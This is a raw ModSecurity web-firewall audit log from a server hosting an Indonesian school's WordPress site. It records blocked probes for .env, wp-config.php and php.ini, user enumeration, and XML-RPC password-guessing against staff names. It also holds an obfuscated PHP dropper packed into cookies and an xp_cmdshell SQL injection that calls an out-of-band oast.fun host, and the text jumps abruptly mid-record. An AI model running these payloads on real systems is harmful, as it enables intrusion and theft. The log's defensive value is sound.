ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747949825305096 2170 (- - -) Stopwatch2: 1747949825305096 2170; combined=1402, p1=294, p2=1053, p3=14, p4=16, p5=25, sr=40, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6f84967-Z-- --3cb9c104-A-- [23/May/2025:05:01:33 +0700] aC-evR67_KloOut96EndRQAAAJg 103.236.140.4 34976 103.236.140.4 8181 --3cb9c104-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Charset: utf-8 --3cb9c104-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cb9c104-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747951293990934 696 (- - -) Stopwatch2: 1747951293990934 696; combined=269, p1=233, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cb9c104-Z-- --1238837d-A-- [23/May/2025:05:17:31 +0700] aC-ie2_WNRyhaqaKDLwgjwAAAMw 103.236.140.4 35276 103.236.140.4 8181 --1238837d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.239.54.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.239.54.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1238837d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1238837d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747952251534688 3138 (- - -) Stopwatch2: 1747952251534688 3138; combined=1365, p1=467, p2=861, p3=0, p4=0, p5=37, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1238837d-Z-- --bfef4f09-A-- [23/May/2025:05:19:51 +0700] aC-jBx67_KloOut96EndXQAAAIg 103.236.140.4 35286 103.236.140.4 8181 --bfef4f09-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.157.114.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.157.114.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bfef4f09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfef4f09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747952391816870 3111 (- - -) Stopwatch2: 1747952391816870 3111; combined=1368, p1=494, p2=845, p3=0, p4=0, p5=29, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfef4f09-Z-- --84c44d50-A-- [23/May/2025:05:23:43 +0700] aC-j71YzwfxII7zMfyHcPAAAAAc 103.236.140.4 35302 103.236.140.4 8181 --84c44d50-B-- GET /wp-content/themes/twentyseven/index.php HTTP/1.0 Host: smkn22-jkt.sch.id Cookie: 14[5]=;14[7]=7;14[12]=1;14[14]=14;14[19]=2;14[21]=21;14[26]=3;14[28]=28;14[33]=4;14[35]=35;14[40]=file_exists;14[42]=42;14[47]=fopen;14[49]=49;14[54]=trim;14[56]=56;14[61]=8;14[63]=63;14[68]=9;14[70]=70;14[75]=base64_decode;14[77]=77;14[82]=11;14[84]=84;14[89]=12;14[91]=91;14[96]=/test-422.txt;14[98]=98;14[103]=14;14[105]=105;14[110]=a;14[112]=112;14[117]=16;14[119]=119;14[124]=17;14[126]=126;14[131]=18;14[133]=133;14[138]=19;14[140]=140;14[145]=20;14[147]=147;14[152]=getcwd;14[154]=154;14[159]=22;14[161]=161;14[166]=23;14[168]=168;14[173]=24;14[175]=175;14[180]=fwrite;14[182]=182;14[187]=26;14[189]=189;14[194]=27;14[196]=196;14[201]=28;14[203]=203;14[208]= string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0mbkqa4kqtm561jt3n0eem7mgzxr4daj.oast.fun'-- --5d45bd1b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d45bd1b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747956607178938 3783 (- - -) Stopwatch2: 1747956607178938 3783; combined=2496, p1=549, p2=1856, p3=29, p4=34, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d45bd1b-Z-- --83d5e67f-A-- [23/May/2025:07:35:22 +0700] aC_Cyrz70bfNdlplZZOzEwAAAFg 103.236.140.4 38768 103.236.140.4 8181 --83d5e67f-B-- GET /php.ini HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --83d5e67f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83d5e67f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747960522391225 1705 (- - -) Stopwatch2: 1747960522391225 1705; combined=716, p1=308, p2=380, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83d5e67f-Z-- --c351a020-A-- [23/May/2025:07:35:22 +0700] aC_Cyrz70bfNdlplZZOzFAAAAFM 103.236.140.4 38770 103.236.140.4 8181 --c351a020-B-- GET /php.ini HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c351a020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c351a020-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747960522420794 1578 (- - -) Stopwatch2: 1747960522420794 1578; combined=628, p1=301, p2=301, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c351a020-Z-- --c8de8c1a-A-- [23/May/2025:07:40:29 +0700] aC_D_W_WNRyhaqaKDLwiNwAAANg 103.236.140.4 39618 103.236.140.4 8181 --c8de8c1a-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c8de8c1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8de8c1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747960829127161 813 (- - -) Stopwatch2: 1747960829127161 813; combined=306, p1=271, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8de8c1a-Z-- --2a05f846-A-- [23/May/2025:07:40:29 +0700] aC_D_W_WNRyhaqaKDLwiOAAAAME 103.236.140.4 39620 103.236.140.4 8181 --2a05f846-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2a05f846-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a05f846-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747960829152313 684 (- - -) Stopwatch2: 1747960829152313 684; combined=246, p1=215, p2=0, p3=0, p4=0, p5=31, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a05f846-Z-- --f4796b65-A-- [23/May/2025:07:51:52 +0700] aC_GqG_WNRyhaqaKDLwiagAAANI 103.236.140.4 40046 103.236.140.4 8181 --f4796b65-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1737 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.172 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --f4796b65-C-- system.multicall methodName wp.getUsersBlogs params Miswan M.Ag, M.Kom pass Miswan M.Ag, M.Kom Miswan M.Ag, M.Kom --f4796b65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4796b65-E-- --f4796b65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747961512787330 7295 (- - -) Stopwatch2: 1747961512787330 7295; combined=5417, p1=513, p2=4780, p3=0, p4=0, p5=74, sr=91, sw=50, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4796b65-Z-- --5461036f-A-- [23/May/2025:07:56:27 +0700] aC_Hu1YzwfxII7zMfyHejAAAAAk 103.236.140.4 40128 103.236.140.4 8181 --5461036f-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1732 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --5461036f-C-- system.multicall methodName wp.getUsersBlogs params SMKN 22 Jakarta password SMKN 22 Jakarta SMKN 22 Jakarta --5461036f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5461036f-E-- --5461036f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747961787607018 7295 (- - -) Stopwatch2: 1747961787607018 7295; combined=5690, p1=461, p2=5035, p3=0, p4=0, p5=112, sr=89, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5461036f-Z-- --3f732d21-A-- [23/May/2025:07:58:01 +0700] aC_IGbz70bfNdlplZZOzqAAAAFM 103.236.140.4 40148 103.236.140.4 8181 --3f732d21-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1743 User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --3f732d21-C-- system.multicall methodName wp.getUsersBlogs params SMKN 22 Jakarta SMKN 22 Jakarta2024 SMKN 22 Jakarta SMKN 22 Jakarta --3f732d21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f732d21-E-- --3f732d21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747961881177735 7410 (- - -) Stopwatch2: 1747961881177735 7410; combined=5770, p1=462, p2=5098, p3=0, p4=0, p5=120, sr=85, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f732d21-Z-- --bbcb5d4d-A-- [23/May/2025:07:59:35 +0700] aC_Id1YzwfxII7zMfyHelwAAABg 103.236.140.4 40162 103.236.140.4 8181 --bbcb5d4d-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1734 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.172 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --bbcb5d4d-C-- system.multicall methodName wp.getUsersBlogs params SMKN 22 Jakarta smkn22-jkt SMKN 22 Jakarta SMKN 22 Jakarta --bbcb5d4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbcb5d4d-E-- --bbcb5d4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (0+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747961975979296 7468 (- - -) Stopwatch2: 1747961975979296 7468; combined=5789, p1=459, p2=5152, p3=0, p4=0, p5=105, sr=91, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbcb5d4d-Z-- --a78d6d12-A-- [23/May/2025:08:02:22 +0700] aC_JHh67_KloOut96Ene0AAAAI4 103.236.140.4 40200 103.236.140.4 8181 --a78d6d12-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1727 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:114.0) Gecko/20100101 Firefox/114.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --a78d6d12-C-- system.multicall methodName wp.getUsersBlogs params Tim Kreatif Tim Kreatif2025 Tim Kreatif Tim Kreatif --a78d6d12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a78d6d12-E-- --a78d6d12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747962142481349 6637 (- - -) Stopwatch2: 1747962142481349 6637; combined=4907, p1=399, p2=4326, p3=0, p4=0, p5=109, sr=75, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a78d6d12-Z-- --ce722112-A-- [23/May/2025:08:04:10 +0700] aC_Jih67_KloOut96Ene1QAAAJY 103.236.140.4 40334 103.236.140.4 8181 --ce722112-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 64.227.70.2 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --ce722112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce722112-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747962250278335 705 (- - -) Stopwatch2: 1747962250278335 705; combined=257, p1=227, p2=0, p3=0, p4=0, p5=30, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce722112-Z-- --3208c82e-A-- [23/May/2025:08:07:39 +0700] aC_KW1YzwfxII7zMfyHeyQAAAAg 103.236.140.4 40380 103.236.140.4 8181 --3208c82e-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1771 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --3208c82e-C-- system.multicall methodName wp.getUsersBlogs params Wakil Bidang Kesiswaan Wakil Bidang Kesiswaan2024 Wakil Bidang Kesiswaan Wakil Bidang Kesiswaan --3208c82e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3208c82e-E-- --3208c82e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 